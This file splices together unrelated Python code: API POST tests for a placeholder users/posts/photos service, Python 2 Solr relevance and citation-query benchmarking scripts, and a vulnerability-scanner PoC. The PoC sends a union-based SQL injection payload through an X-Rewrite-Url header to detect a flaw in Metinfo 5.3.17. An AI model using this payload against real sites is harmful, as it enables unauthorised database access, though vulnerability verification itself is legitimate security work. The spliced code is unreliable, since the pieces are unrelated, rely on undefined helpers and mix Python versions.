def test_users_post(): # post запрос на добавление нового юзера. k = req(gbl.users_url) le = k.json_lenght() + 1 payload = { "name": "Glenna Reichert", "username": "******", "email": "*****@*****.**", "address": { "street": "Dayna Park", "suite": "Suite 449", "city": "Bartholomebury", "zipcode": "76495-3109", "geo": { "lat": "24.6463", "lng": "-168.8889" } }, "phone": "(775)976-6794 x41206", "website": "conrad.com", "company": { "name": "Yost and Sons", "catchPhrase": "Switchable contextually-based project", "bs": "aggregate real-time technologies" } } q = request(gbl.users_url, gbl.schema_users_post(le), payload) q.post_simple()
def test_albums_post(param_users): # post запрос на добавление нового альбома, проверяем при разных userId k = req(gbl.albums_url) le = k.json_lenght() + 1 payload = {"title": "post_19:55", "userId": param_users} q = request(gbl.albums_url, gbl.schema_albums_post(param_users, le), payload) q.post_simple()
def test_comments_post(param_posts): # post запрос на добавление нового поста, проверяем при разных userId k = req(gbl.comments_url) le = k.json_lenght()+1 payload = {"name":"comm_19:55","body":"this is simple new post by me", "postId":param_posts,"email":"*****@*****.**"} q = request(gbl.comments_url,gbl.schema_comments_post(param_posts,le), payload) q.post_simple()
def test_todos_post(param_users): # post запрос на добавление нового задания, проверяем при разных userId k = req(gbl.todos_url) le = k.json_lenght() + 1 payload = { "title": "post_19:55", "completed": False, "userId": param_users } q = request(gbl.todos_url, gbl.schema_todos_post(param_users, le), payload) q.post_simple()
def test_posts_post(param_users): # post запрос на добавление нового поста, проверяем при разных userId k = req(gbl.posts_url) le = k.json_lenght() + 1 payload = { "title": "post_19:55", "body": "this is simple new post by me", "userId": param_users } q = request(gbl.posts_url, gbl.schema_posts_post(param_users, le), payload) q.post_simple()
def test_photos_post(param_albums): # post запрос на добавление нового фото, проверяем при разных albumId k = req(gbl.photos_url) le = k.json_lenght() + 1 payload = { "title": "post_19:55", "url": "https://azcxards.net/3/1", "thumbnailUrl": "https://azcxards.net/3/1", "albumId": param_albums } q = request(gbl.photos_url, gbl.schema_photos_post(param_albums, le), payload) q.post_simple()
def run(solr_url, query, haystack, qf="title,author", min=0.0, max=2.0, increment=0.25, max_hits=100): min = float(min) max = float(max) increment = float(increment) max_hits = int(max_hits) if (os.path.exists(query)): queries = load_queries(query) else: queries = [query] if (os.path.exists(haystack)): haystack = load_queries(haystack) else: haystack = [haystack] haystack = [x.split(':', 1) for x in haystack] fl = ','.join(list(set([x[0] for x in haystack]))) combinations = generate_combinations(qf, min, max, increment) results = {'variations': combinations} i = 0 for qf in combinations: i = i + 1 log.info("Starting combination: %s %d/%d" % (qf, i, len(combinations))) for q in queries: log.info("%s" % q) rsp = req(solr_url, q=q, qf=qf, fl=fl, rows=max_hits) collect_data(q, qf, results, rsp, haystack) def custom_handler(obj): if isinstance(obj, DataPoint): return obj.jsonize() return obj out = {} out['results'] = results out['simplified'] = output_positions(results) out['params'] = dict(max=max, min=min, increment=increment, solr=solr_url, query=query, maxhits=max_hits, generated=datetime.date.today().isoformat()) print simplejson.dumps(out, default=custom_handler)
def select_representative_record(rsp, solr_url, j, query_name): if not rsp['response'].has_key('docs'): return None tmp_results = [] for doc in rsp['response']['docs']: q = "bibcode:%s" % doc['bibcode'] cit_rsp = req(solr_url, q=("%s(%s)" % (query_name, q)), fl="citation_count", rows=0) if (not cit_rsp['responseHeader'].has_key('status') or cit_rsp['responseHeader']['status'] != 0): log.error("Error searching: %s" % str(rsp)) continue numfound = cit_rsp['response']['numFound'] qtime = cit_rsp['responseHeader']['QTime'] tmp_results.append((q, numfound, qtime)) if numfound == j: break if len(tmp_results): return sorted(tmp_results, key=lambda x: abs((x[1] % j)))[0]
def verify(self, first=False): # 漏洞验证方法(mode=verify) target = self.scan_info.get("Target", "") # 获取测试目标 verbose = self.scan_info.get("Verbose", False) # 是否打印详细信息 # 以下是PoC的检测逻辑 url = urljoin(target,'index.php?lang=Cn&index=1') payload = "1/2/zxxza' union select 1,2,3,md5(0x11),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#/index.php" headers = { "X-Rewrite-Url": payload } location = "" # 使用req做HTTP请求的发送和响应的处理,req是TCC框架将requests的HTTP请求方法封装成统一的req函数,使用req(url, method, **kwargs),参数传递同requests resp = req(url, 'get', headers=headers, allow_redirects=False) if resp is not None: location = resp.headers.get("Location", "") if "47ed733b8d10be225eceba344d533586" in location: self.scan_info['Success'] = True # 漏洞存在,必须将该字段更新为True(必须) self.scan_info['Ret']['VerifyInfo']['URL'] = url # 记录漏洞相关的一些额外信息(可选) self.scan_info['Ret']['VerifyInfo']['DATA'] = "X-Rewrite-Url:" + payload if verbose: highlight('[*] Metinfo 5.3.17 X-Rewrite-url SQL Injection found') # 打印高亮信息发现漏洞,其他可用方法包括info()/warn()/error()/highlight()方法分别打印不同等级的信息
def run(solr_url, query_name='citations', fl="title,author,recid,bibcode", min=0, max=4000000, increment=9, max_hits=10, max_qtime=60000 ): results = [] # first start with simple queries i = 0 j = None empty = 0 while False: i = i + 1 j = i + increment q = "citation_count:[%s TO %s]" % (i,j) log.info("%s" % q) rsp = req(solr_url, q=q, fl=fl, rows=max_hits, sort="citation_count desc") r = select_representative_record(rsp, solr_url, j, query_name) if r != None: results.append(r) empty = 0 else: empty = empty + 1 if empty > 3: break if j >= max: break i = j start_id = max end_id = start_id incr = 100 cycle = 1 while True: end_id = end_id + (cycle * (incr * increment)) q = "id:[%s TO %s]" % (start_id, end_id) log.info("%s" % q) # first issue the query without citations rsp = req(solr_url, q=q, fl=fl, rows=1) # now execute the functional query rsp = req(solr_url, q=("%s(%s)" % (query_name, q)), fl=fl, rows=1) if (not rsp['responseHeader'].has_key('status') or rsp['responseHeader']['status'] != 0): log.error("Error searching: %s" % str(rsp)) continue numfound = rsp['response']['numFound'] qtime = rsp['responseHeader']['QTime'] results.append((q, numfound, qtime)) if numfound > max or qtime > max_qtime: log.info("Stopping because qtime too high: %s" % (qtime,)) break log.info("last found: q=%s, num=%s, qtime=%s" % (q, numfound, qtime)) cycle += 1 today = datetime.date.today() previous = today resolution = 30 stop_day = datetime.date.fromordinal(today.toordinal()-(365*2)) while False: q = "pubdate:[%s TO %s]" % (str(previous),str(today)) log.info("%s" % q) # now execute the functional query rsp = req(solr_url, q=("%s(%s)" % (query_name, q)), fl=fl, rows=1) if (not rsp['responseHeader'].has_key('status') or rsp['responseHeader']['status'] != 0): log.error("Error searching: %s" % str(rsp)) continue numfound = rsp['response']['numFound'] qtime = rsp['responseHeader']['QTime'] results.append((q, numfound, qtime)) previous = previous.fromordinal(previous.toordinal() - resolution) if previous < stop_day: break print "#%s" % (query_name,) print "query\tnumFound\tQTime" print "\n".join(map(lambda x: "%s\t%s\t%s" % x, results))